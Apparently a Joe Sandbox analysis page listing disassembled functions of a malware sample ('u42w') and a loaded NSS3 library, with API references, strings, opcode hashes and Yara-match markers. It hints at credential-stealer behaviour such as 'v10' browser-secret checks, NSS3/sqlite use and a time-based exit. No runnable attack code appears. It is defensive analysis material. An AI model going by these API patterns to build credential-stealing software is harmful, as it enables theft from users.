Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 5303e8b0a560fefca7da098d29ddf66122e76fee1affa40d45572e867032544e
Instruction ID: 34556820f6e5338ba8e8a845a83fb71131f6fb13afd6d5a2f2d9a2f2ab0dc7f0
Opcode Fuzzy Hash: 5303e8b0a560fefca7da098d29ddf66122e76fee1affa40d45572e867032544e
Instruction Fuzzy Hash: 4F514FB5A04209DFCB18CF54D595AAE7BB6FF48308F10817DE802AB390D734EA95CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004097F0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 115memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 0040980B
memset.MSVCRT ref: 0040983E
LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F60C98,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Strings

v10, xrefs: 00409802
@, xrefs: 00409847

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
String ID: @$v10
API String ID: 1400469952-24753345
Opcode ID: e18eec538fa561213ccf180fba20d045b7f3e1eebe33c1532388784ee480f8f5
Instruction ID: 87859f0eaa1cac66c0422607c8296a2f5b7cfd88fdb957a476e5adb471fb7cf1
Opcode Fuzzy Hash: e18eec538fa561213ccf180fba20d045b7f3e1eebe33c1532388784ee480f8f5
Instruction Fuzzy Hash: 00414EB0A00208EBDB04DFA5DC55FDE7B75BF44304F108119F909AB295DB78AE85CB98

Uniqueness

Uniqueness Score: -1.00%

Function 6C9E2460 Relevance: 7.6, APIs: 5, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,6CA87379,00000002,?), ref: 6C9E2493
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C9E24B4
PR_SetError.NSS3(FFFFE005,00000000,?,?,?,?,?,6CA87379,00000002,?), ref: 6C9E24EA
PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,6CA87379,00000002,?), ref: 6C9E24F5
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,6CA87379,00000002,?), ref: 6C9E24FE

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Error$Alloc_FreeK11_Utilfree
String ID:
API String ID: 2595244113-0
Opcode ID: e55f5e22a919d8a33635baae8d234f1208e2f4825eeb9cf3dc1d676a35b0ea6e
Instruction ID: 9860a47c3ba7c3903592d0689f3c565415ef2ed0813ba98633f99406c9cd2751
Opcode Fuzzy Hash: e55f5e22a919d8a33635baae8d234f1208e2f4825eeb9cf3dc1d676a35b0ea6e
Instruction Fuzzy Hash: 6831E1B1A00117AFEB058FA5DC45BBF77A8EF68308F108125FD1496A90F735D855C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6C9544D0 Relevance: 7.6, APIs: 5, Instructions: 90COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3 ref: 6C9544FF

Part of subcall function 6C9B07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C958298,?,?,?,6C94FCE5,?), ref: 6C9B07BF
Part of subcall function 6C9B07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C9B07E6
Part of subcall function 6C9B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C9B081B
Part of subcall function 6C9B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C9B0825

SECOID_FindOID_Util.NSS3(?), ref: 6C954524
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C954537
CERT_AddExtensionByOID.NSS3(00000001,?,?,?,00000001), ref: 6C954579

Part of subcall function 6C9541B0: PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C9541BE
Part of subcall function 6C9541B0: PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C9541E9
Part of subcall function 6C9541B0: SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C954227
Part of subcall function 6C9541B0: SECITEM_CopyItem_Util.NSS3(?,-00000018,?), ref: 6C95423D

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C95459C

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Util$Error$Alloc_ArenaCopyFindHashItem_LookupTable$ConstEqual_ExtensionItems
String ID:
API String ID: 3193526912-0
Opcode ID: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction ID: b26436077bf3c93370efcd25ebbbb36a8ed8cb1e7518eb2b785c24387149cc08
Opcode Fuzzy Hash: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction Fuzzy Hash: AC21F5717052009BEB90CE29AC84F6B37AC9F51658F940428FC15CFB49E721E936CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C95AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6C953FFF,00000000,?,?,?,?,?,6C951A1C,00000000,00000000), ref: 6C95ADA7

Part of subcall function 6C9B14C0: TlsGetValue.KERNEL32 ref: 6C9B14E0
Part of subcall function 6C9B14C0: EnterCriticalSection.KERNEL32 ref: 6C9B14F5
Part of subcall function 6C9B14C0: PR_Unlock.NSS3 ref: 6C9B150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C953FFF,00000000,?,?,?,?,?,6C951A1C,00000000,00000000), ref: 6C95ADB4

Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B10F3
Part of subcall function 6C9B10C0: EnterCriticalSection.KERNEL32(?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B110C
Part of subcall function 6C9B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1141
Part of subcall function 6C9B10C0: PR_Unlock.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1182
Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C953FFF,?,?,?,?,6C953FFF,00000000,?,?,?,?,?,6C951A1C,00000000), ref: 6C95ADD5

Part of subcall function 6C9AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C9A8D2D,?,00000000,?), ref: 6C9AFB85
Part of subcall function 6C9AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C9AFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CA794B0,?,?,?,?,?,?,?,?,6C953FFF,00000000,?), ref: 6C95ADEC

Part of subcall function 6C9AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA818D0,?), ref: 6C9AB095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C953FFF), ref: 6C95AE3C

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: be955f46fb7b9f317205b084e57858631fe2874d95f66b42b9c62013c853d839
Instruction ID: 7adb074bbda1c9005225496531a8f3e93bf402781317420bf93d49703414aaee
Opcode Fuzzy Hash: be955f46fb7b9f317205b084e57858631fe2874d95f66b42b9c62013c853d839
Instruction Fuzzy Hash: 7C112671E002056BE710DB65AC40BBF77BCEFB524CF444229EC1996741FB20E96D82B6

Uniqueness

Uniqueness Score: -1.00%

Function 004135E0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(0041D8AC,?,?,004137D1,00000000,?,02F60C98,?,0041D8AC,?,00000000,?), ref: 0041362C
sscanf.NTDLL ref: 00413659
SystemTimeToFileTime.KERNEL32(0041D8AC,00000000,?,?,?,?,?,?,?,?,?,?,?,02F60C98,?,0041D8AC), ref: 00413672
SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,02F60C98,?,0041D8AC), ref: 00413680
ExitProcess.KERNEL32 ref: 0041369A

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 206953169676f68ef5873ac71a5c5530c3512e9c7508a8b221d3de6f3f6071f5
Instruction ID: a268315634fda69ed0a537ef202e87298384d27024bdd5aae2ec85167a5c17e0
Opcode Fuzzy Hash: 206953169676f68ef5873ac71a5c5530c3512e9c7508a8b221d3de6f3f6071f5
Instruction Fuzzy Hash: 6421BA75D14209ABCB14EFE4D945AEEB7BABF4C305F04852EE50AE3250EB345644CB68

Uniqueness

Uniqueness Score: -1.00%

Function 6C9E04C0 Relevance: 7.6, APIs: 5, Instructions: 63synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6C9E461B,-00000004), ref: 6C9E04DF
TlsGetValue.KERNEL32(?,00000000,?,6C9E461B,-00000004), ref: 6C9E0510
EnterCriticalSection.KERNEL32(ED850FDC), ref: 6C9E0520
PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6C9E461B,-00000004), ref: 6C9E0534
GetLastError.KERNEL32(?,6C9E461B,-00000004), ref: 6C9E0543

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Error$CriticalEnterLastObjectSectionSingleValueWait
String ID:
API String ID: 3052423345-0
Opcode ID: 5b5866bd736f4d3f91e58104454bc81af91e4161d705296523e2ca9d1f861b3e
Instruction ID: ec8aeb7362afab76acc60cdc5bab5113b41d9e2939ac9cd48a96651114693a02
Opcode Fuzzy Hash: 5b5866bd736f4d3f91e58104454bc81af91e4161d705296523e2ca9d1f861b3e
Instruction Fuzzy Hash: 7E112771A042826BEB017E7A9C04B6936A8EF3A318F609624E429D3991EF32D145DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C97CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C991E10: TlsGetValue.KERNEL32 ref: 6C991E36
Part of subcall function 6C991E10: EnterCriticalSection.KERNEL32(?,?,?,6C96B1EE,2404110F,?,?), ref: 6C991E4B
Part of subcall function 6C991E10: PR_Unlock.NSS3 ref: 6C991E76

free.MOZGLUE(?,6C97D079,00000000,00000001), ref: 6C97CDA5
PK11_FreeSymKey.NSS3(?,6C97D079,00000000,00000001), ref: 6C97CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C97D079,00000000,00000001), ref: 6C97CDCF
DeleteCriticalSection.KERNEL32(?,6C97D079,00000000,00000001), ref: 6C97CDE2
free.MOZGLUE(?), ref: 6C97CDE9

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: 3ca82860aebc9df1367c67ebaf58cf3e0d49bc197cc0636597b1f58a6ae9a536
Instruction ID: 9b543faa3158f8f0a77e16f37393be65bb2c00ee062023ab0c3c59e8ea05e8bb
Opcode Fuzzy Hash: 3ca82860aebc9df1367c67ebaf58cf3e0d49bc197cc0636597b1f58a6ae9a536
Instruction Fuzzy Hash: 7011CAB2B01216ABEF10AF95ED45A96777DFF1425C7144121E90987E01E733E864C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6C9E2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C9E5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C9E5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C9E2CEC

Part of subcall function 6C9FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9FC2BF

PR_EnterMonitor.NSS3(?), ref: 6C9E2D02
PR_EnterMonitor.NSS3(?), ref: 6C9E2D1F
PR_ExitMonitor.NSS3(?), ref: 6C9E2D42
PR_ExitMonitor.NSS3(?), ref: 6C9E2D5B

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: 704d6d62207a7ca47fee4cfc2e892cfe42ec34ae44cf73041cf22774e54c2ca5
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: 1701A1B1A046019BE7319E26FC40BD7B7A6EF69318F004535E95E86B20E632E859C792

Uniqueness

Uniqueness Score: -1.00%

Function 6CA6ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6CA6A6D8), ref: 6CA6AE0D
free.MOZGLUE(?), ref: 6CA6AE14
DeleteCriticalSection.KERNEL32(6CA6A6D8), ref: 6CA6AE36
free.MOZGLUE(?), ref: 6CA6AE3D
free.MOZGLUE(00000000,00000000,?,?,6CA6A6D8), ref: 6CA6AE47

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 3c671e1881c34f87b54b649f0fe4a549d3418fef115f7ab3ec889ec44f4ff055
Instruction ID: db35235ee7701165b22c4a1fa697554efe7482fa09dcd1a765dcd1dfe404c548
Opcode Fuzzy Hash: 3c671e1881c34f87b54b649f0fe4a549d3418fef115f7ab3ec889ec44f4ff055
Instruction Fuzzy Hash: DEF0FC75201B1757DA049FE5E40892B7779BF457787144328E12A83940D737E512C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 004185A7 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004185B3

Part of subcall function 00417B2C: __getptd_noexit.LIBCMT ref: 00417B2F
Part of subcall function 00417B2C: __amsg_exit.LIBCMT ref: 00417B3C

__getptd.LIBCMT ref: 004185CA
__amsg_exit.LIBCMT ref: 004185D8
__lock.LIBCMT ref: 004185E8
__updatetlocinfoEx_nolock.LIBCMT ref: 004185FC

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: ce05a91ea9c2b8e711ac95fae42e6a284d9b9390d13ac8f67e08820a18d7d66a
Instruction ID: cdd0eec35e4bf80da2317afb9b55000317a90f0185e5a3c9ee5e330d7cc08b67
Opcode Fuzzy Hash: ce05a91ea9c2b8e711ac95fae42e6a284d9b9390d13ac8f67e08820a18d7d66a
Instruction Fuzzy Hash: A4F09632A49710AAD721BBBA9C027CA77B1AF00739F10411FF505A62D2CF6C69C1CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 6C8E6C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C8E6D36

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C8E6D20
%s at line %d of [%.10s], xrefs: 6C8E6D2F
database corruption, xrefs: 6C8E6D2A

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 82446d8ea004bb29120a5145ec39d91a7d34c78fa9c22031661388b82d650c07
Instruction ID: 824aff722d9cada2b55c270628a39e8bf355ce5a1e3dd4394ba38065cfd2383b
Opcode Fuzzy Hash: 82446d8ea004bb29120a5145ec39d91a7d34c78fa9c22031661388b82d650c07
Instruction Fuzzy Hash: C221E5707003099BC7208E19DA41B5AB7F6BF4A319F54492CD9499BF51E372F98487A1

Uniqueness

Uniqueness Score: -1.00%

Function 004132F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00413323

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

ShellExecuteEx.SHELL32(0000003C), ref: 004133E6
ExitProcess.KERNEL32 ref: 00413415

Strings

<, xrefs: 00413399

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 506305d3720733ee5bab3c9d26159c4130547b258465aef6203612f55fa41ddd
Instruction ID: 9270ca21e45796c21bf284f368f95b7d0dbf71ea93a5a7258f1c6a627d8bac6b
Opcode Fuzzy Hash: 506305d3720733ee5bab3c9d26159c4130547b258465aef6203612f55fa41ddd
Instruction Fuzzy Hash: 383144B19012189BDB14EB91DD91FDDBB78AF48304F80518DF20566191DF746B89CF9C

Uniqueness

Uniqueness Score: -1.00%

Function 6CA1CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6CA1CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CA1CC7B), ref: 6CA1CD7A
Part of subcall function 6CA1CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CA1CD8E
Part of subcall function 6CA1CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CA1CDA5
Part of subcall function 6CA1CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CA1CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CA1CCB5
memcpy.VCRUNTIME140(6CAB14F4,6CAB02AC,00000090), ref: 6CA1CCD3
memcpy.VCRUNTIME140(6CAB1588,6CAB02AC,00000090), ref: 6CA1CD2B

Part of subcall function 6C939AC0: socket.WSOCK32(?,00000017,6C9399BE), ref: 6C939AE6
Part of subcall function 6C939AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C9399BE), ref: 6C939AFC

Part of subcall function 6C940590: closesocket.WSOCK32(6C939A8F,?,?,6C939A8F,00000000), ref: 6C940597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6CA1CCB0

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
